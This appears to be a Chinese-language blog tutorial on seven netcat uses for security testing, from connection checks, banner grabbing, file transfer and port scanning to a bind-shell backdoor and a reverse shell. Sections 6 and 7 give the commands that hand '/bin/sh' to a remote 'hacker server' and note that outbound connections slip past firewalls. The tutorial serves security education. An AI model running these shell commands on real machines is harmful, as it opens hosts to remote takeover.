NetCAT 的七種滲透式安全測試用法

NetCAT 的七種滲透式安全測試用法

NetCAT 是網路安全測試必備的瑞士小刀,一個小小的工具程式可以完成許多網路相關的安全測試,

當然也是許多駭客必備工具,這篇文章主要說明七種安全測試使用情境。

1. 連線測試

這種測試就像是使用 telnet,確定該遠端電腦的 IP 與 port 服務是否可以連線正常

# nc     10.0.2.100 22

 

2. 取得遠端服務回應訊息

例如遠端電腦是 HTTP Server ,可以透過 HTTP HEAD 的方式,將遠端網站伺服器的回應 header 取得。

# echo -e “HEAD / HTTP/1.0\n\n” | nc 10.0.2.100 80

網站伺服器可能會回復如下,因此我們可以得知該網站伺服器為 Apache 2.1.15

HTTP/1.1 403 Forbidden
Date: Thu, 09 Nov 2015 4:10:00 GMT
Server: Apache/2.1.15 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Thu, 10 Nov 2015 4:10:00 GMT

3. 將本機電腦通訊服務埠啟動

例如下列指令會將本機10.0.1.1  port 1234 啟動,listening遠端任何電腦的連線

# nc -l -p 1234

因此,我們可以在另外一台遠端電腦輸入下列指令

# telnet    10.0.1.1     1234

就可以讓兩台電腦互相連線對話

 

4.1 檔案電腦 B 傳送到電腦 A (listener 10.0.1.1)

電腦 A (10.0.1.1) 輸入下列指令,以便讓電腦A可以接收電腦 B之後所傳送的檔案。

並且儲存輸出檔名為  fileToPass.out

# nc -l -p   1234 >    fileToPass.out

電腦 B 要傳送檔案到電腦A,執行下列指令

# nc -w3 10.0.1.1 1234 < fileToPass

4.2 檔案電腦 A(listener 10.0.1.1)傳送到電腦 B

電腦A (listner , 10.0.1.1 1234)

# nc -l -p 1234 < fileToPass

電腦B

# nc -w3 10.0.1.1 1234 > fileToPass.out

5. Port Scanning

# nc -n -v -z -w 1 10.0.1.1 1-3000

掃描電腦 10.0.1.1 port 範圍1-3000

  • -w 1: 每次連線等待時間不要超過 1秒
  • -v: verbose
  • -z: 不要傳送任何資料
  • -n: 不要DNS解析

port Scanning 可以讓我們知道該遠端電腦有開啟那些常見的服務。

另外建議可以使用 nmap來對網路進行偵測

6. Backdoor Shell 後門程式

NetCat可以執行成為後門程式,下列指令執行之後,就可以允許讓遠端電腦連線至 port 1234 執行 Shell指令

受害者電腦 10.0.0.1  port 8080<<<<<<<=============== 遠端駭客伺服器

受害者電腦執行,listen 8080:

# nc -e /bin/sh -l -p 8080

遠端駭客電腦執行,連線至受害者電腦 10.0.0.1 8080:

# telnet 10.0.0.1     8080# ls;

通常駭客利用這種方式,將某台電腦主機開啟某特定的通訊埠 (如8080),

讓駭客可以在遠端連線至該電腦進行操作。

7. Reverse shell (殭屍電腦)

這種情境與上述有些不同。這個情境下,該電腦會主動連線回駭客伺服器,讓駭客可以在遠端伺服器操作。

受害者電腦  ===============>>>>>>>>>>>  遠端駭客伺服器10.0.0.2 port 8080

遠端駭客電腦(10.0.0.2) 執行, listen 8080:

# nc -n -v -l -p 8080

受害電腦(10.0.0.1) 執行,連線至遠端駭客電腦 10.0.0.2 8080:

# nc -e /bin/sh 10.0.0.2 8080

這個情境下﹑遠端駭客電腦 10.0.0.2 port 8080等待受害者電腦的連線

通常來說,企業內部防火牆會阻擋異常的外部對內部的連線 (InBound),

但是內部到外部伺服器8080 (OutBound)的連線就很容易通過,

因此這種情境駭客用在對於企業內部電腦連線至遠端駭客伺服器,成為駭客的殭屍電腦的一種手法之一。

NetCAT 七種駭客使用 NetCAT的測試情境。

  • 連線 port connection 測試
  • Server Banner 取得
  • Listening Server
  • 檔案傳輸
  • Port Scanning
  • Backdoor Shell 後門程式
  • Reverse Backdoor Shell殭屍電腦

 

參考資料何處下載

http://netcat.sourceforge.net/download.php

https://eternallybored.org/misc/netcat/

網路測試的瑞士刀 Netcat 的10+種使用方法

Leave a Reply

Your email address will not be published.